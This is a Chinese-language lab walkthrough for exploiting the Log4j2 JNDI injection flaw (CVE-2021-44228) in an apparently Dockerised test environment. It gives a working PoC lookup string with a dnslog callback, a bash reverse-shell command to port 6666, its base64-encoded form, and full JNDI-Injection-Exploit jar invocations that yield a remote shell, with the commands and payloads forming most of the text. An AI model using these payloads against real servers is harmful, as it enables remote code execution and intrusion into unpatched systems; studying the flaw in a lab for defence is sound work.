CVE-2021-44228 Apache Log4j2 远程代码执行漏洞

Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。

漏洞验证

开启docker镜像，进入8983端口

 选择该Poc

${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
##################################################
sys:java.bersion 大致意思就是一个系统命令，可以查看Java版本

构造一个dns连接地址

 将地址填入上方的poc中并进行利用

 进入到该页面后，返回Dnslog平台查看数据返回，成功发现java版本,漏洞验证成功

漏洞利用

下载JNDI注入工具,

 

 利用漏洞需要用到的反弹shell的命令

bash -i >& /dev/tcp/ip/6666 0>&1
ip就是要反弹到的主机的ip
6666是监听端口

再对这条命令进行base64编码

 加密完成后，构造payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzMvNjY2NiAwPiYxCgo=}|{base64,-d}|{bash,-i}" -A "192.168.1.33"
#-C后面的参数是要执行的命令以及编码方式，-A后面就是对应ip地址；base64,-d 表示用base64来解码

启动rmi和ldap服务器 

 可以看到这个工具为我们生成了几个有恶意流量导向的地址

此时开启6666端口监听

 此时返回刚才的网站进行JNDI注入，构造url

 发现本该重定向到恶意地址的网站回显连接失败

 参考了多篇文章仍然无果

一筹莫展时发现

更换了解码平台之后就能利用成功了

重新构造

java -jar /root/桌面/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAyLjY2LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "172.16.102.66"

返回刚才的页面将恶意的流量导向url填进去

返回kali，发现导向成功

查看监听的端口并发送whoami指令

漏洞利用成功